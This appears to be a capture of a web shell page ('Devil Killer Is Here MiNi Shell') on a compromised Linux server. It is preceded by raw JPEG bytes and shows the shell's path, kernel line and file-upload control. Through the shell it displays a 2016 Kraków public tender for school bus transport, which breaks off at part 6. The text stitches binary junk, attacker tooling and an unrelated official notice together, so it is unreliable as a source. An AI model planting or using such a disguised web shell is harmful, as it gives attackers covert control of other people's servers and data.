JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160411/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160411/37167-N-2016.html

<p class="kh_header"><b>Kraków: Świadczenie usług przewozu dzieci do i ze szkół na terenie Gminy Miejskiej Kraków w roku szkolnym 2016/2017</b><br>
<b>Numer ogłoszenia: 37167 - 2016; data zamieszczenia: 11.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiki Oświaty w Krakowie , ul. Ułanów 9, 31-450 Kraków, woj. małopolskie, tel. 12 617 88 88, faks 12 410 43 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zeo.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług przewozu dzieci do i ze szkół na terenie Gminy Miejskiej Kraków w roku szkolnym 2016/2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie w okresie od września 2016r. do czerwca 2017r. usług przewozu dzieci do i ze szkół na terenie Gminy Miejskiej Kraków w dni powszednie od poniedziałku do piątku, z wyłączeniem dni wolnych od zajęć szkolnych (ferie, święta, itp.) środkami transportu sprawnymi technicznie i przystosowanymi do przewozów pasażerskich. 
Przewozem objęci będą uczniowie placówek:
1) Szkoły Podstawowej Nr 27 w Krakowie, ul. Podedworze 16,
2) Szkoły Podstawowej Nr 74 w Krakowie, ul. Branicka 26,
3) Szkoły Podstawowej Nr 80 w Krakowie, os. Na Skarpie 8,
4) Gimnazjum Nr 77 w Krakowie, ul. Sawy Calińskiego 12
5) Zespołu Szkolno-Przedszkolnego Nr 9 w Krakowie, ul. Prawocheńskiego 7
6) Szkoły Podstawowej Nr 53 w Krakowie, ul. Skośna 8.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca winien wnieść przed upływem terminu składania ofert  wadium w wysokości 5.800,-  zł (słownie: pięć tysięcy osiemset  00/100 zł) w pieniądzu  lub w innej formie zgodnej z art. 45 ust. 6 ustawy Pzp. W przypadku składania ofert częściowych wadium dla każdej części wynosi: część 1 - 1.000,- zł (słownie: jeden tysiąc 00/100 zł), część 2 - 600,- zł (słownie: sześćset  00/100 zł), część 3 - 700,- zł (słownie: siedemset  00/100 zł), część 4 -  800,- zł (słownie: osiemset  00/100 zł), część 5 - 1.300,- zł (słownie: jeden tysiąc trzysta  00/100 zł), część 6 - 1.400,- zł (słownie: jeden tysiąc czterysta 00/100 zł).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca winien posiadać aktualną licencję na wykonywanie krajowego transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001r. o transporcie drogowym (tekst jednolity: Dz. U. z 2007r, Nr 125, poz. 874 ze zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał lub nadal należycie wykonuje co najmniej  dwie usługi przewozowe osób  o charakterze ciągłym spełniające dodatkowo poniższe wymogi: - dot. usług zakończonych: okres realizacji każdej usługi -co najmniej 6 miesięcy,  - dot. usług niezakończonych: zrealizowany okres świadczenia każdej usługi - co najmniej 6 miesięcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca winien wskazać w wykazie co najmniej dwie  usługi spełniające warunek, o którym mowa w pkt. III.3.2 oraz winien złożyć dowody dotyczące tych usług, jeżeli usługi te nie  były/są  wykonane/wykonywane na rzecz Zamawiającego, określające, że usługi te zostały wykonane należycie/ są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1) Uzupełnienie pkt. III.4.1):  Dotyczy sytuacji, gdy Wykonawca w celu wykazania spełnienia warunków udziału w postępowaniu będzie polegać na zasobach innych podmiotów:  Dokument/-y udowadniający/-, że Wykonawca będzie dysponował zasobami innych podmiotów niezbędnymi do realizacji zamówienia, w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

III.6.2) Uzupełnienie pkt. III.4.3): Jeżeli w kraju miejsca zamieszkania osoby lub kraju, w którym  Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy,  złożone przed  właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub  gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce  zamieszkania, lub przed notariuszem - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

III.6.3) Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli Wykonawca ustanowił pełnomocnika w ww. zakresie.

 III.6.4) Wypełniony i podpisany przez Wykonawcę formularz  ofertowy.

III.6.5) Dowód wniesienia wadium.

III.6.6) Informacja dot. powstania u Zamawiającego obowiązku podatkowego w podatku VAT w trybie art. 91 ust. 3a ustawy Pzp</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas podstawienia zastępczego środka transportu - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zeo.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiki Oświaty w Krakowie, ul. Ułanów 9, Kraków - pok. 50.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2016 godzina 10:30, miejsce: Zespół Ekonomiki Oświaty w Krakowie, ul. Ułanów 9, Kraków -dziennik podawczy/sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> IV.4.16.1) Uzupełnienie pkt. II.2) Termin realizacji zadania: Świadczenie usług w okresie od  01.09.2016r. do  30.06.2017r., a jeżeli zawarcie  umowy nastąpi po 01.09.2016r - od dnia zawarcia  umowy do 30.06.2017r. IV.4.16.2) Uzupełnienie pkt. IV.4.1) Specyfikację istotnych warunków zamówienia (SIWZ) można odebrać w Zespole Ekonomiki Oświaty w Krakowie, ul. Ułanów 9, pokój nr 50 w poniedziałki. w godz. 10:00 -15:00, w pozostałe dni robocze (z wyjątkiem czwartków ) w godz. 10.00-14.00 -(koszt materiałów: 7,- zł, w tym  VAT). W celu odebrania SIWZ niezbędne będzie podanie Zamawiającemu numeru NIP Wykonawcy. SIWZ dostępna jest także na stronie internetowej Zamawiającego www.zeo.krakow.pl. Ww. uzupełnienie nie dotyczy pobierania SIWZ ze strony internetowej Zamawiającego. IV.4.16.3) Inne informacje uzupełniające: Pracownicy upoważnieni do kontaktów z Wykonawcami: Aleksandra Kostrzewa. Zamawiający nie zamierza zawierać umowy ramowej. Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów. Przed wszczęciem postępowania o udzielenie zamówienia nie przeprowadzono dialogu technicznego;  Nie przewiduje się udzielenia zaliczek na poczet wykonania zamówienia; Nie ogranicza się możliwości ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50% pracowników stanowią osoby niepełnosprawne; Nie przewiduje się zastosowania aukcji elektronicznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkoła Podstawowa nr 27 w Krakowie, ul. Podedworze 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie w roku szkolnym 2016/2017 usługi przewozu dzieci  do i ze Szkoły Podstawowej nr 27 w Krakowie przy ul. Podedworze 16 w dni powszednie od poniedziałku do piątku, z wyłączeniem dni wolnych od zajęć szkolnych (ferie, święta, itp) środkami transportu sprawnymi technicznie i przystosowanymi do przewozów pasażerskich wraz z kierowcami i opiekunami. 
Częstotliwość przejazdów: 1 kurs ranny ( - przywiezienie uczniów do szkoły),  1 kurs popołudniowy (-odwiezienie uczniów ze szkoły).
Trasa przewozu: 
- Kurs ranny (-przywiezienie dzieci do szkoły): - przystanki: Barycz, Żelazowskiego, Szczegów, Kokocice, Niebieska Autostrada, Hala Sportowa Piaski Wielkie, Piaski Wielkie,  Łużycka, Bochenka, Tuchowska, Nowosądecka, Podedwórze - szkoła.
- Kurs popołudniowy (-odwiezienie dzieci ze szkoły): Szkoła - Podedwórze, Nowosądecka, przystanki: Tuchowska, Bochenka, Łużycka, Piaski Wielkie, Hala Sportowa Piaski Wielkie, Niebieska Autostrada, Kokocice, Szczegów, Żelazowskiego, Barycz.
Planowana liczba przewożonych uczniów podczas każdego kursu: 40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia zastępczego środka transportu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkoła Podstawowa nr 74 w Krakowie, ul. Branicka 26.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie w roku szkolnym 2016/2017  usługi przewozu dzieci  do i ze Szkoły Podstawowej nr 74 w Krakowie  przy  ul. Branickiej 26 w dni powszednie od poniedziałku do piątku, z wyłączeniem dni wolnych od zajęć szkolnych (ferie, święta, itp) środkami transportu sprawnymi technicznie i przystosowanymi do przewozów pasażerskich wraz z kierowcami i opiekunami. 
Trasa przewozu:
 - Kurs ranny (-przywiezienie dzieci do szkoły): Osiedle Przylasek Rusiecki - pętla autobusowa ul. Rzepakowa, E. Szymańskiego, Karaszewicza-Tokarzewskiego, Branicka - szkoła.
 - Kurs popołudniowy (-odwiezienie dzieci ze szkoły): Szkoła - ul. Branicka, Karaszewicza-Tokarzewskiego, E. Szymańskiego, Rzepakowa, pętla autobusowa.
Planowana liczba przewożonych uczniów podczas każdego kursu: 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia zastępczego środka transportu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkoła Podstawowa nr 80 w Krakowie, os. Na Skarpie 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie w roku szkolnym 2016/2017  usługi przewozu dzieci  do i ze Szkoły Podstawowej nr 80 w Krakowie  na os. Na Skarpie 8 w dni powszednie od poniedziałku do piątku, z wyłączeniem dni wolnych od zajęć szkolnych (ferie, święta, itp) środkami transportu sprawnymi technicznie i przystosowanymi do przewozów pasażerskich wraz z kierowcami i opiekunami. 
Częstotliwość przejazdów: 1 kurs ranny ( - przywiezienie uczniów do szkoły),  1 kurs popołudniowy (-odwiezienie uczniów ze szkoły).
Trasa przewozu:
- Kurs ranny (-przywiezienie dzieci do szkoły): ul. Nadbrzezie, Suchy Jar, karowa, Dymarek do ul. Ziemianek, Dymarek, Igołomska, Ptaszyckiego,  Jana Pawła II, do Placu Centralnego i ponownie ul. Jana Pawła II pod szkołę.
- Kurs popołudniowy (-odwiezienie dzieci ze szkoły): ul. Jana Pawłą II, Ptaszyckiego, Igołomska, Dymarek, Ziemianek, a po zawróceniu ul. Dymarek, Karowa, Suchy Jar, Nadbrzezie do Igołomskiej.
Planowana liczba przewożonych  uczniów podczas każdego kursu: 24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia zastępczego środka transportu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Gimnazjum nr 77 w Krakowie, ul. Sawy Calińskiego 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie w roku szkolnym 2016/2017  usługi przewozu dzieci  do i z Gimnazjum nr 77 w Krakowie przy ul. Sawy Calińskiego 12 w dni powszednie od poniedziałku do piątku, z wyłączeniem dni wolnych od zajęć szkolnych (ferie, święta, itp) środkami transportu sprawnymi technicznie i przystosowanymi do przewozów pasażerskich wraz z kierowcami i opiekunami.
Częstotliwość przejazdów: 1 kurs ranny ( - przywiezienie uczniów do szkoły),  1 kurs popołudniowy (-odwiezienie uczniów ze szkoły).
Trasa przewozu:
- Kurs ranny (-przywiezienie dzieci do szkoły): os. Wolica (ul. Bartnicza), os. Przylasek Rusiecki (ul. Ciekowiec), os. Branice (ul. Deszczowa), Cło (ul. Igołomska), szkoła (ul. Sawy-Calińskiego).
- Kurs popołudniowy (-odwiezienie dzieci ze szkoły): Szkoła, Cło, os. Wolica, os. Przylasek Rusiecki, os. Branice.
Planowana liczba przewożonych  uczniów podczas każdego kursu: 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia zastępczego środka transportu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zespół Szkolno-Przedszkolny nr 9, ul. Prawocheńskiego 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie w roku szkolnym 2016/2017  usługi przewozu dzieci  do i z Zespołu Szkolno-Przedszkolnego nr 9 w Krakowie przy ul. Prawocheńskiego 7 w dni powszednie od poniedziałku do piątku, z wyłączeniem dni wolnych od zajęć szkolnych (ferie, święta, itp) środkami transportu sprawnymi technicznie i przystosowanymi do przewozów pasażerskich wraz z kierowcami i opiekunami. 
Trasa przewozu:  winna obejmować przejazd ulicami Igołomską, ul. Jeziorko, ul. Wiewiórczą, ul. Rusiecką, ul. Czeczeńską oraz przyjazd pod budynek szkoły.
Planowana liczba przewożonych  uczniów podczas każdego kursu: 27.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia zastępczego środka transportu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szkoła Podstawowa nr 53, ul. Skośna 8.</p>
